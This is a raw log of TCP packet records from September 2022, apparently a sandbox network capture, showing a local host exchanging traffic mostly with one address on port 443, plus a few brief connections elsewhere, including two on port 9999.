                                                                                                                                                Sep 29, 2022 14:49:40.925394058 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.925448895 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.925465107 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.925507069 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.926326036 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.926350117 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.926410913 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.926430941 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.926471949 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.933259964 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.933305979 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.933367014 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.933392048 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.933410883 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.933432102 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.933450937 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.933495045 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.933505058 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.933640003 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.934333086 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.934376001 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.934451103 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.934473991 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.934492111 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.934526920 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.935221910 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.935250998 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.935353041 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.935374975 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.935429096 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.935559034 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.935581923 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.935655117 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.935669899 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.935720921 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.936573029 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.936604977 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.936666012 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.936682940 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.936714888 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.936737061 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.937767029 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.937798977 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.937865019 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.937887907 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.937921047 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.937961102 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.938122988 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.938148975 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.938205004 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.938229084 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.938252926 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.938276052 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.938493013 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.938518047 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.938579082 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.938601017 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.938623905 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.938643932 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.938972950 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.939002991 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.939054012 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.939076900 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.939097881 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.939117908 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.939922094 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.939954996 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.940015078 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.940040112 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.940057039 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.940088034 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.940442085 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.940475941 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.940524101 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.940548897 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.940568924 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.940598965 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.940857887 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.940893888 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.940952063 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.940979004 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.940995932 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.941025019 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.941175938 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.941203117 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.941267014 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.941289902 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.941339970 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.941888094 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.941931009 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.941978931 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.942002058 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.942028046 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.942063093 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.942209005 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.942241907 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.942291021 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.942307949 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.942338943 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.942387104 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949011087 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949052095 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949179888 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949179888 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949209929 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949285984 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949306011 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949328899 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949371099 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949390888 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949421883 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949430943 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949454069 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949495077 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949580908 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949636936 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949660063 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949678898 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949759960 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949759960 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.949965000 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.949994087 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.950054884 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.950078964 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.950098991 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.950131893 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.950258017 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.950285912 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.950360060 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.950375080 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.950422049 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.950643063 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.950670958 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.950731039 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.950757980 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.950781107 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.950804949 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.951001883 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.951028109 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.951096058 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.951119900 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.951142073 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.951169968 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.951364994 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.951404095 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.951445103 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.951467037 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.951493025 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.951513052 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.951678038 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.951724052 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.951822996 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.951822996 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.951842070 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.951903105 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.953593969 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.953632116 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.953696012 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.953717947 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.953758955 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.953783035 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.953979015 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954009056 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954056025 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954077005 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954102039 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954123974 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954227924 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954262018 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954303980 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954324961 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954355001 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954372883 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954492092 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954525948 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954569101 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954590082 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954615116 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954641104 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954762936 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954797983 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954833031 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954847097 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954864025 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954896927 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954919100 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954931021 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.954972029 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.954981089 CEST44349752185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:40.955024958 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:40.955475092 CEST49752443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:41.345501900 CEST4975380192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:41.363452911 CEST8049753172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:41.363620043 CEST4975380192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:41.370513916 CEST4975380192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:41.388611078 CEST8049753172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:41.414741039 CEST8049753172.217.168.14192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:41.562247992 CEST4975380192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:42.489603043 CEST4975380192.168.2.3172.217.168.14
                                                                                                                                                Sep 29, 2022 14:49:43.078025103 CEST497489999192.168.2.3200.119.204.12
                                                                                                                                                Sep 29, 2022 14:49:43.119225025 CEST49754443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:43.119311094 CEST44349754104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.119429111 CEST49754443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:43.122631073 CEST49754443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:43.122767925 CEST44349754104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.498358011 CEST49755443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:43.498446941 CEST44349755140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.498596907 CEST49755443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:43.498929024 CEST49755443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:43.498982906 CEST44349755140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.530858040 CEST497569999192.168.2.3200.87.164.69
                                                                                                                                                Sep 29, 2022 14:49:43.554276943 CEST44349754104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.554380894 CEST49754443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:43.554419041 CEST44349754104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.554482937 CEST49754443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:43.555417061 CEST44349755140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.601423979 CEST49755443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:43.601464033 CEST44349755140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.620615005 CEST44349755140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.620866060 CEST44349755140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.620966911 CEST49755443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:43.620982885 CEST44349755140.82.121.4192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.621088982 CEST49755443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:43.621628046 CEST49755443192.168.2.3140.82.121.4
                                                                                                                                                Sep 29, 2022 14:49:43.622184992 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.622261047 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.622381926 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.622689962 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.622728109 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.667854071 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.670545101 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.670595884 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.696688890 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.698731899 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.698785067 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.698828936 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.698863029 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.698918104 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.698940992 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.701833010 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.701888084 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.701972961 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.701998949 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.702019930 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.712189913 CEST49754443192.168.2.3104.208.16.94
                                                                                                                                                Sep 29, 2022 14:49:43.712213993 CEST44349754104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.712666988 CEST44349754104.208.16.94192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.713371038 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.713435888 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.713543892 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.713543892 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.713579893 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.715945005 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.715981960 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.716052055 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.716090918 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.716116905 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.717438936 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.717492104 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.717556953 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.717586994 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.717622042 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.719441891 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.719465017 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.719574928 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.719608068 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.719635010 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.728137970 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.728207111 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.728357077 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.728418112 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.728527069 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.729609966 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.729652882 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.729731083 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.729763985 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.729795933 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.730789900 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.730842113 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.730918884 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.730951071 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.730979919 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.732367039 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.732424021 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.732561111 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.732562065 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.732589006 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.733371019 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.733436108 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.733483076 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.733510017 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.733536005 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.734428883 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.734472036 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.734548092 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.734570026 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.734596014 CEST49757443192.168.2.3185.199.108.133
                                                                                                                                                Sep 29, 2022 14:49:43.735518932 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.735570908 CEST44349757185.199.108.133192.168.2.3
                                                                                                                                                Sep 29, 2022 14:49:43.735604048 CEST49757443192.168.2.3185.199.108.133
